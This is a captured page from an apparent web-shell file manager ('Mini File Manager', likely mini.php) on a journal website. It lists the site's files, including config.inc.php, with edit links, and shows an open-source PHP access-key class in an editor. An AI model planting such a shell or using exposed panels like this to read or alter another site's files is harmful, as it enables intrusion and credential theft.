Mini File Manager

File Manager

Current Directory: /home/lartcid/public_html/journal.lartc.id

[Back]

.. [Open]

.htaccess [Edit]

.well-known [Open]

README.md [Edit]

api [Open]

cache [Open]

cgi-bin [Open]

classes [Open]

config.TEMPLATE.inc.php [Edit]

config.inc.php [Edit]

controllers [Open]

cypress.json [Edit]

dbscripts [Open]

docs [Open]

error_log [Edit]

favicon.ico [Edit]

index.php [Edit]

js [Open]

lib [Open]

locale [Open]

mini.php [Edit]

pages [Open]

php.ini [Edit]

plugins [Open]

public [Open]

registry [Open]

scheduledTaskLogs [Open]

schemas [Open]

styles [Open]

templates [Open]

tools [Open]

Edit File

<?php

/**
 * @file classes/security/AccessKeyManager.inc.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2000-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @class AccessKeyManager
 * @ingroup security
 * @see AccessKey
 *
 * @brief Class defining operations for AccessKey management.
 */

class AccessKeyManager {
	var $accessKeyDao;

/**
	 * Constructor.
	 * Create a manager for access keys.
	 */
	function __construct() {
		$this->accessKeyDao = DAORegistry::getDAO('AccessKeyDAO');
		$this->_performPeriodicCleanup();
	}

/**
	 * Generate a key hash from a key.
	 * @param $key string
	 * @return string
	 */
	function generateKeyHash($key) {
		return md5($key);
	}

/**
	 * Validate an access key based on the supplied credentials.
	 * If $assocId is specified, it must match the associated ID of the
	 * key exactly.
	 * @param $context string The context of the access key
	 * @param $userId int
	 * @param $keyHash string The access key "passcode"
	 * @param $assocId string optional assoc ID to check against the keys in the database
	 * @return AccessKey
	 */
	function validateKey($context, $userId, $keyHash, $assocId = null) {
		return $this->accessKeyDao->getAccessKeyByKeyHash($context, $userId, $keyHash, $assocId);
	}

/**
	 * Create an access key with the given information.
	 * @param $context string The context of the access key
	 * @param $userId int The ID of the effective user for this access key
	 * @param $assocId int The associated ID of the key
	 * @param $expiryDays int The number of days before this key expires
	 * @return accessKey string The generated passkey
	 */
	function createKey($context, $userId, $assocId, $expiryDays) {
		$accessKey = new AccessKey();
		$accessKey->setContext($context);
		$accessKey->setUserId($userId);
		$accessKey->setAssocId($assocId);
		$accessKey->setExpiryDate(Core::getCurrentDate(time() + (60 * 60 * 24 * $expiryDays)));

$key = Validation::generatePassword();
		$accessKey->setKeyHash($this->generateKeyHash($key));

$this->accessKeyDao->insertObject($accessKey);

return $key;
	}

/**
	 * Periodically clean up expired keys.
	 */
	function _performPeriodicCleanup() {
		if (time() % 100 == 0) {
			$accessKeyDao = DAORegistry::getDAO('AccessKeyDAO'); /* @var $accessKeyDao AccessKeyDAO */
			$accessKeyDao->deleteExpiredKeys();
		}
	}
}